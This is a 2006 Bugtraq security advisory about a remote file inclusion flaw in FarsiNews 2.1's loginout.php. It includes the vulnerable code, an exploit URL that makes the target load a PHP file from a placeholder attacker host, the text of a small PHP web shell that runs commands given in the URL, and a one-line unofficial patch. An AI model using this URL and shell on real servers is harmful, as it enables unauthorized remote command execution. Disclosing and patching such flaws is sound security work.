FarsiNews 2.1 PHP Remote File Inclusion
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx, "content-editor@xxxxxxxxxxxxxxxxx" <content-editor@xxxxxxxxxxxxxxxxx>, "editor@xxxxxxxxxxxxxxxxx" <editor@xxxxxxxxxxxxxxxxx>, "expert@xxxxxxxxxxxxxx" <expert@xxxxxxxxxxxxxx>, "news-editor@xxxxxxxxxxxxxxxxx" <news-editor@xxxxxxxxxxxxxxxxx>, "support@xxxxxxxxxxx" <support@xxxxxxxxxxx>, "vuldb@xxxxxxxxxxxxxxxxx" <vuldb@xxxxxxxxxxxxxxxxx>, "vuln@xxxxxxxxxxx" <vuln@xxxxxxxxxxx>, "webmaster@xxxxxxxxxxx" <webmaster@xxxxxxxxxxx>, "webmaster@xxxxxxxxxxxxxxxxx" <webmaster@xxxxxxxxxxxxxxxxx>
- Subject: FarsiNews 2.1 PHP Remote File Inclusion
- From: h e <het_ebadi@xxxxxxxxx>
- Date: Tue, 31 Jan 2006 05:47:57 -0800 (PST)
- Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=oaEA5VLbxwjaXzTDZ80szd5aR9khUWlokf59ceVWLR23T/h94Vi2fxLwfBpEivNXNUV+6p3SXT+tEbcCAuwu/sKMcpfUu1bGaCol10Yv3IdGywQ0Q16CCJev0V6o7a4OGbp/Xo3r07NviXToTGF9AXmv66/Y7hidjW80wqMRn20= ;
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Remote File Inclusion in FarsiNews 2.1 and below
Credit:
The information has been provided by Hamid Ebadi
(Hamid Network Security Team) :admin@xxxxxxxxx
The original article can be found at :
http://hamid.ir/security
Vulnerable Systems:
FarsiNews 2.1 Beta 2 and below
Vulnerable Code:
The following lines in loginout.php :
require_once($cutepath."/inc/functions.inc.php");
require_once($cutepath."/data/config.php");
Exploits:
If register_globals=ON has been marked (check
PHP.INI) we can exploit below URL to cause it to
include external file.
The following URL will cause the server to include
external files ( phpshell.txt ):
http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell.txt?
phpshell.txt
-------------------
<?
system ($_GET['cmd']);
die ("<h3>http://Hamid.ir >> Hamid Ebadi << (Hamid
Network Security Team)</h3> ");
?>
-----[EOF]--------
Workaround:
use FarsiNews 2.5 or for Unofficial Patch , simply add
the following line in the second line of
loginout.php:
if (isset($_REQUEST["cutepath"])){ die("Patched by
Hamid Ebadi -->http://hamid.ir ( Hamid Network
Security Team) "); }
Signature
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com